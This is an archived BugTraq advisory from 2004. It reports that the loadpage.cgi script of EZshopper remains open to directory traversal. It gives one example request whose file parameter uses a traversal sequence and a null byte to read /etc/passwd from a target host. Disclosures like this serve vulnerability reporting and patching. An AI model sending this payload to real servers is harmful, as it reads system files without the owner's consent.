BugTraq
EZshopper is still vulnerable against Directory Traversal. Nov 25 2004 03:33PM
Zero_X www.lobnan.de Team (zero-x linuxmail org)


Product: EZshopper

Versions: all

URL: www.ahg.com

Vulnerability: Directory Traversal

Date: November 25, 2004

Discovered by: Zero X <Zero_X (at) excluded (dot) org [email concealed]>

loadpage.cgi of EZshopper allows Directory Traversal

Example:

http://targethost/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.
|./etc/passwd%00.html

- Zero X

- http://www.excluded.org

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus